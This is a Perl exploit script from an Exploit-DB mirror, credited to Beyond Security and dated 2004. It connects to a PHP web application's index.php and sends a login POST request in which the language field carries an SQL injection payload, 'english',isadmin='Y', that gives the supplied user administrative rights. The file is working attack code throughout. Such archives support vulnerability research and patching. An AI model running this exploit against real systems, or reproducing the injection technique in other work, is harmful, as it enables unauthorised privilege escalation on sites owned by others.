exploit-db-mirror/platforms/php/webapps/406.pl

#!/usr/bin/perl
# Exploit code by Noam Rathaus of Beyond Security Ltd.
# The following exploit code will use a valid username and password 
combination, to cause an SQL injection.
# Using the SQL injection, the Perl script elevates the privileges of the 
user provided to administrative.

use IO::Socket;
use strict;

my $Host = shift;
my $Path = shift;
my $Username = shift;
my $Password = shift;

if ($Host eq "" || $Path eq "" || $Username eq "" || $Password eq "")
{
print "You must run the script with the following syntax:\n";
print $0." hostname path username password\n";
exit(0);
}

my $remote = IO::Socket::INET->new (  Proto => "tcp", PeerAddr => $Host, 
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $Host" }

print "connected\n";

$remote->autoflush(1);

my $http = "POST /$Path/index.php HTTP/1.1
Host: $Host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040506 
Firefox/0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: ";

my $content = 
"PHP_AUTH_USER=$Username&password=$Password&language=english',isadmin='Y&login=Login";

$http .= length($content)."

$content";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

while ()
{
print $_;
}
print "\n";

close $remote;


# milw0rm.com [2004-08-20]